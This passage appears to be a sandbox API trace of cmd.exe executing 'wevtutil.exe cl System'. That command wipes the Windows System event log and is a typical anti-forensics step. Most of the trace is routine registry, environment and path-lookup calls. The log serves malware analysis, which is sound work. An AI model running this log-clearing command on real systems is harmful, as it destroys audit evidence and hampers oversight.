lpType=0x27ed60*=0x4, lpData=0x27ed80*=0x40, lpcbData=0x27ed64*=0x4) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x0, lpData=0x27ed80*=0x40, lpcbData=0x27ed64*=0x1000) returned 0x2 [0090.058] RegCloseKey (hKey=0x44) returned 0x0 [0090.058] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x27ed68 | out: phkResult=0x27ed68*=0x44) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x0, lpData=0x27ed80*=0x40, lpcbData=0x27ed64*=0x1000) returned 0x2 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x4, lpData=0x27ed80*=0x1, lpcbData=0x27ed64*=0x4) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x0, lpData=0x27ed80*=0x1, lpcbData=0x27ed64*=0x1000) returned 0x2 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x4, lpData=0x27ed80*=0x0, lpcbData=0x27ed64*=0x4) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x4, lpData=0x27ed80*=0x9, lpcbData=0x27ed64*=0x4) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x4, lpData=0x27ed80*=0x9, lpcbData=0x27ed64*=0x4) returned 0x0 [0090.058] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x27ed60, lpData=0x27ed80, lpcbData=0x27ed64*=0x1000 | out: lpType=0x27ed60*=0x0, lpData=0x27ed80*=0x9, lpcbData=0x27ed64*=0x1000) returned 0x2 [0090.058] RegCloseKey (hKey=0x44) returned 0x0 [0090.059] time (in: timer=0x0 | out: timer=0x0) returned 0x1ad63547d1a [0090.059] srand (_Seed=0x63547d1a) [0090.059] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl System" [0090.059] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" cmd.exe /C wevtutil.exe cl System" [0090.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a25c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0090.059] GetProcessHeap () returned 0x2d0000 [0090.059] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eaaa0 [0090.059] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2eaab0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0090.059] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0090.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0090.059] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0090.059] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0090.059] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0090.059] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0090.059] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0090.059] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0090.059] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0090.059] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0090.059] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0090.059] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0090.059] GetProcessHeap () returned 0x2d0000 [0090.060] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9580 | out: hHeap=0x2d0000) returned 1 [0090.060] GetEnvironmentStringsW () returned 0x2e8af0* [0090.060] GetProcessHeap () returned 0x2d0000 [0090.060] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa94) returned 0x2eb760 [0090.060] FreeEnvironmentStringsW (penv=0x2e8af0) returned 1 [0090.060] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0090.060] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0090.060] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0090.060] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0090.060] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0090.060] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0090.060] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0090.060] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0090.060] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0090.060] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0090.060] GetProcessHeap () returned 0x2d0000 [0090.060] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x5c) returned 0x2d1320 [0090.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x27fb70 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0090.060] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x27fb70, lpFilePart=0x27fb50 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x27fb50*="Desktop") returned 0x25 [0090.060] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0090.060] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x27f880 | out: lpFindFileData=0x27f880*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x409658c0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x409658c0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="Users", cAlternateFileName="")) returned 0x2e8950 [0090.060] FindClose (in: hFindFile=0x2e8950 | out: hFindFile=0x2e8950) returned 1 [0090.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x27f880 | out: lpFindFileData=0x27f880*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x409658c0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x409658c0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2e8950 [0090.061] FindClose (in: hFindFile=0x2e8950 | out: hFindFile=0x2e8950) returned 1 [0090.061] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0090.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x27f880 | out: lpFindFileData=0x27f880*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3d5798e0, ftLastAccessTime.dwHighDateTime=0x18d1aee, ftLastWriteTime.dwLowDateTime=0x3d5798e0, ftLastWriteTime.dwHighDateTime=0x18d1aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xdd0000dd, cFileName="Desktop", cAlternateFileName="")) returned 0x2e8950 [0090.061] FindClose (in: hFindFile=0x2e8950 | out: hFindFile=0x2e8950) returned 1 [0090.061] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0090.061] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0090.061] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0090.061] GetProcessHeap () returned 0x2d0000 [0090.061] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb760 | out: hHeap=0x2d0000) returned 1 [0090.061] GetEnvironmentStringsW () returned 0x2e8af0* [0090.061] GetProcessHeap () returned 0x2d0000 [0090.061] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2eacc0 [0090.061] FreeEnvironmentStringsW (penv=0x2e8af0) returned 1 [0090.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a25c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0090.061] GetProcessHeap () returned 0x2d0000 [0090.061] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2d1320 | out: hHeap=0x2d0000) returned 1 [0090.061] GetProcessHeap () returned 0x2d0000 [0090.061] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4016) returned 0x2eccf0 [0090.062] GetProcessHeap () returned 0x2d0000 [0090.062] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x42) returned 0x2f0d40 [0090.062] GetProcessHeap () returned 0x2d0000 [0090.062] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccf0 | out: hHeap=0x2d0000) returned 1 [0090.062] GetConsoleOutputCP () returned 0x1b5 [0090.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a25bfe0 | out: lpCPInfo=0x4a25bfe0) returned 1 [0090.062] GetUserDefaultLCID () returned 0x409 [0090.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a257b50, cchData=8 | out: lpLCData=":") returned 2 [0090.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x27fc80, cchData=128 | out: lpLCData="0") returned 2 [0090.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x27fc80, cchData=128 | out: lpLCData="0") returned 2 [0090.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x27fc80, cchData=128 | out: lpLCData="1") returned 2 [0090.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a26a740, cchData=8 | out: lpLCData="/") returned 2 [0090.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a26a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0090.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a26a460, cchData=32 | out: lpLCData="Tue") returned 4 [0090.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a26a420, cchData=32 | out: lpLCData="Wed") returned 4 [0090.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a26a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0090.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a26a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0090.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a26a360, cchData=32 | out: lpLCData="Sat") returned 4 [0090.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a26a700, cchData=32 | out: lpLCData="Sun") returned 4 [0090.063] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a257b40, cchData=8 | out: lpLCData=".") returned 2 [0090.063] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a26a4e0, cchData=8 | out: lpLCData=",") returned 2 [0090.063] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0090.064] GetProcessHeap () returned 0x2d0000 [0090.064] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2f1d80 [0090.064] GetConsoleTitleW (in: lpConsoleTitle=0x2f1d80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0090.064] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0090.064] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0090.064] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0090.064] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0090.064] GetProcessHeap () returned 0x2d0000 [0090.064] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4012) returned 0x2eccf0 [0090.064] GetProcessHeap () returned 0x2d0000 [0090.064] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eccf0 | out: hHeap=0x2d0000) returned 1 [0090.065] _wcsicmp (_String1="wevtutil.exe", _String2=")") returned 78 [0090.065] _wcsicmp (_String1="FOR", _String2="wevtutil.exe") returned -17 [0090.065] _wcsicmp (_String1="FOR/?", _String2="wevtutil.exe") returned -17 [0090.065] _wcsicmp (_String1="IF", _String2="wevtutil.exe") returned -14 [0090.065] _wcsicmp (_String1="IF/?", _String2="wevtutil.exe") returned -14 [0090.065] _wcsicmp (_String1="REM", _String2="wevtutil.exe") returned -5 [0090.065] _wcsicmp (_String1="REM/?", _String2="wevtutil.exe") returned -5 [0090.065] GetProcessHeap () returned 0x2d0000 [0090.065] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0) returned 0x2eb7b0 [0090.065] GetProcessHeap () returned 0x2d0000 [0090.065] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x2a) returned 0x2e6520 [0090.065] GetProcessHeap () returned 0x2d0000 [0090.065] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x26) returned 0x2e45e0 [0090.066] GetConsoleTitleW (in: lpConsoleTitle=0x27fb90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0090.067] GetFileAttributesW (lpFileName="wevtutil.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wevtutil.exe")) returned 0xffffffff [0090.067] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0090.067] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0090.067] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0090.067] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0090.067] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0090.067] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0090.067] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0090.067] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0090.067] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0090.067] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0090.067] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0090.067] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0090.067] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0090.067] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0090.067] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0090.067] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0090.067] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0090.067] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0090.067] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0090.067] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0090.067] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0090.067] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0090.067] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0090.067] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0090.067] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0090.067] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0090.067] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0090.067] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0090.067] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0090.067] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0090.067] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0090.067] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0090.067] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0090.067] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0090.067] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0090.067] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0090.067] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0090.067] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0090.067] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0090.068] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0090.068] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0090.068] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0090.068] _wcsicmp (_String1="wevtutil", _String2="DIR") returned 19 [0090.068] _wcsicmp (_String1="wevtutil", _String2="ERASE") returned 18 [0090.068] _wcsicmp (_String1="wevtutil", _String2="DEL") returned 19 [0090.068] _wcsicmp (_String1="wevtutil", _String2="TYPE") returned 3 [0090.068] _wcsicmp (_String1="wevtutil", _String2="COPY") returned 20 [0090.068] _wcsicmp (_String1="wevtutil", _String2="CD") returned 20 [0090.068] _wcsicmp (_String1="wevtutil", _String2="CHDIR") returned 20 [0090.068] _wcsicmp (_String1="wevtutil", _String2="RENAME") returned 5 [0090.068] _wcsicmp (_String1="wevtutil", _String2="REN") returned 5 [0090.068] _wcsicmp (_String1="wevtutil", _String2="ECHO") returned 18 [0090.068] _wcsicmp (_String1="wevtutil", _String2="SET") returned 4 [0090.068] _wcsicmp (_String1="wevtutil", _String2="PAUSE") returned 7 [0090.068] _wcsicmp (_String1="wevtutil", _String2="DATE") returned 19 [0090.068] _wcsicmp (_String1="wevtutil", _String2="TIME") returned 3 [0090.068] _wcsicmp (_String1="wevtutil", _String2="PROMPT") returned 7 [0090.068] _wcsicmp (_String1="wevtutil", _String2="MD") returned 10 [0090.068] _wcsicmp (_String1="wevtutil", _String2="MKDIR") returned 10 [0090.068] _wcsicmp (_String1="wevtutil", _String2="RD") returned 5 [0090.068] _wcsicmp (_String1="wevtutil", _String2="RMDIR") returned 5 [0090.068] _wcsicmp (_String1="wevtutil", _String2="PATH") returned 7 [0090.068] _wcsicmp (_String1="wevtutil", _String2="GOTO") returned 16 [0090.068] _wcsicmp (_String1="wevtutil", _String2="SHIFT") returned 4 [0090.068] _wcsicmp (_String1="wevtutil", _String2="CLS") returned 20 [0090.068] _wcsicmp (_String1="wevtutil", _String2="CALL") returned 20 [0090.068] _wcsicmp (_String1="wevtutil", _String2="VERIFY") returned 1 [0090.068] _wcsicmp (_String1="wevtutil", _String2="VER") returned 1 [0090.068] _wcsicmp (_String1="wevtutil", _String2="VOL") returned 1 [0090.068] _wcsicmp (_String1="wevtutil", _String2="EXIT") returned 18 [0090.068] _wcsicmp (_String1="wevtutil", _String2="SETLOCAL") returned 4 [0090.068] _wcsicmp (_String1="wevtutil", _String2="ENDLOCAL") returned 18 [0090.068] _wcsicmp (_String1="wevtutil", _String2="TITLE") returned 3 [0090.068] _wcsicmp (_String1="wevtutil", _String2="START") returned 4 [0090.068] _wcsicmp (_String1="wevtutil", _String2="DPATH") returned 19 [0090.068] _wcsicmp (_String1="wevtutil", _String2="KEYS") returned 12 [0090.068] _wcsicmp (_String1="wevtutil", _String2="MOVE") returned 10 [0090.068] _wcsicmp (_String1="wevtutil", _String2="PUSHD") returned 7 [0090.068] _wcsicmp (_String1="wevtutil", _String2="POPD") returned 7 [0090.069] _wcsicmp (_String1="wevtutil", _String2="ASSOC") returned 22 [0090.069] _wcsicmp (_String1="wevtutil", _String2="FTYPE") returned 17 [0090.069] _wcsicmp (_String1="wevtutil", _String2="BREAK") returned 21 [0090.069] _wcsicmp (_String1="wevtutil", _String2="COLOR") returned 20 [0090.069] _wcsicmp (_String1="wevtutil", _String2="MKLINK") returned 10 [0090.069] _wcsicmp (_String1="wevtutil", _String2="FOR") returned 17 [0090.069] _wcsicmp (_String1="wevtutil", _String2="IF") returned 14 [0090.069] _wcsicmp (_String1="wevtutil", _String2="REM") returned 5 [0090.069] GetProcessHeap () returned 0x2d0000 [0090.069] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eb870 [0090.069] GetProcessHeap () returned 0x2d0000 [0090.069] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x40) returned 0x2f0d90 [0090.069] _wcsnicmp (_String1="wevt", _String2="cmd ", _MaxCount=0x4) returned 20 [0090.070] GetProcessHeap () returned 0x2d0000 [0090.070] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x420) returned 0x2eba90 [0090.070] SetErrorMode (uMode=0x0) returned 0x0 [0090.070] SetErrorMode (uMode=0x1) returned 0x0 [0090.070] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2ebaa0, lpFilePart=0x27f420 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x27f420*="Desktop") returned 0x25 [0090.070] SetErrorMode (uMode=0x0) returned 0x1 [0090.070] GetProcessHeap () returned 0x2d0000 [0090.070] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2eba90, Size=0x76) returned 0x2eba90 [0090.070] GetProcessHeap () returned 0x2d0000 [0090.070] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2eba90) returned 0x76 [0090.070] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0090.070] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0090.070] GetProcessHeap () returned 0x2d0000 [0090.070] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x128) returned 0x2ebb20 [0090.070] GetProcessHeap () returned 0x2d0000 [0090.070] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x240) returned 0x2ebc50 [0090.140] GetProcessHeap () returned 0x2d0000 [0090.140] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2ebc50, Size=0x12a) returned 0x2ebc50 [0090.140] GetProcessHeap () returned 0x2d0000 [0090.140] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebc50) returned 0x12a [0090.140] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a24f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0090.140] GetProcessHeap () returned 0x2d0000 [0090.140] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe8) returned 0x2ebd90 [0090.140] GetProcessHeap () returned 0x2d0000 [0090.140] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2ebd90, Size=0x7e) returned 0x2ebd90 [0090.140] GetProcessHeap () returned 0x2d0000 [0090.140] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ebd90) returned 0x7e [0090.141] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0090.141] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x27f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f190) returned 0xffffffffffffffff [0090.141] GetLastError () returned 0x2 [0090.141] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe.*", fInfoLevelId=0x1, lpFindFileData=0x27f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f190) returned 0xffffffffffffffff [0090.141] GetLastError () returned 0x2 [0090.141] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x27f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f190) returned 0xffffffffffffffff [0090.142] GetLastError () returned 0x2 [0090.142] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0090.142] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.exe", fInfoLevelId=0x1, lpFindFileData=0x27f190, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x27f190) returned 0x2e8950 [0090.142] GetProcessHeap () returned 0x2d0000 [0090.142] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2e4610 [0090.142] FindClose (in: hFindFile=0x2e8950 | out: hFindFile=0x2e8950) returned 1 [0090.142] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0090.142] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0090.142] GetConsoleTitleW (in: lpConsoleTitle=0x27f6e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0090.142] InitializeProcThreadAttributeList (in: lpAttributeList=0x27f498, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x27f458 | out: lpAttributeList=0x27f498, lpSize=0x27f458) returned 1 [0090.142] UpdateProcThreadAttribute (in: lpAttributeList=0x27f498, dwFlags=0x0, Attribute=0x60001, lpValue=0x27f448, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x27f498, lpPreviousValue=0x0) returned 1 [0090.142] GetStartupInfoW (in: lpStartupInfo=0x27f5b0 | out: lpStartupInfo=0x27f5b0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0090.142] GetProcessHeap () returned 0x2d0000 [0090.142] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2e4640 [0090.142] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0090.142] _wcsnicmp (_String1="COPYCMD", 